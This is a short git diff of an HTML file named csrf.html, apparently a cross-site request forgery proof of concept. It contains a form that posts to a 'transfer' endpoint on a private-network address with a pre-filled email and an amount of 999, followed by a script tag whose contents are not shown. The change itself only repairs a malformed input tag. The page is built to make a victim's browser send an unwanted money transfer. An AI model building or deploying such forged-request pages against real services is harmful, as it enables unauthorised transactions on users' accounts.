--- a/csrf.html
+++ b/csrf.html
@@ -2,7 +2,7 @@
   
     <body>
         <form action="http://192.168.2.98:55824/transfer" method="POST">
-            <input type="text" class="form-control" value="xyz@gmail.com" id="i>
+            <input type="text" class="form-control" value="xyz@gmail.com">
         <input type="number" class="form-control" value="999" id="inputAmount" >
         </form>
         <script>
